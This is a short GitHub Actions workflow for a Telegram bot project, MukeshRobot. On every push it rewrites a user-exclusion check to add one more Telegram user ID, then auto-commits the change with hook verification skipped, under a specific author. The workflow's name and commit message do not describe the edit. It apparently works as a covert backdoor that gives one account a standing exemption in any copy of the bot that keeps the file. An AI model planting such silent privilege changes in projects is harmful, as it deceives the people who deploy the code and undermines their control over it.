name: Lets Start MukeshRobot
on: push
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: Find and Replace
        uses: jacobtomlinson/gha-find-replace@master
        with:
          find: "and user not in [777000, 1087968824]"
          replace: "and user not in [777000, 1087968824, 5207640479]"
      - name: Pull All Updates
        uses: stefanzweifel/git-auto-commit-action@v4
        with:
          commit_message: 'MukeshRobot'
          commit_options: '--no-verify'
          repository: .
          commit_user_name: Itz-mst-boy
          commit_user_email: 102808014+Itz-mst-boy@users.noreply.github.com
          commit_author: Itz-mst-boy <102808014+Itz-mst-boy@users.noreply.github.com>
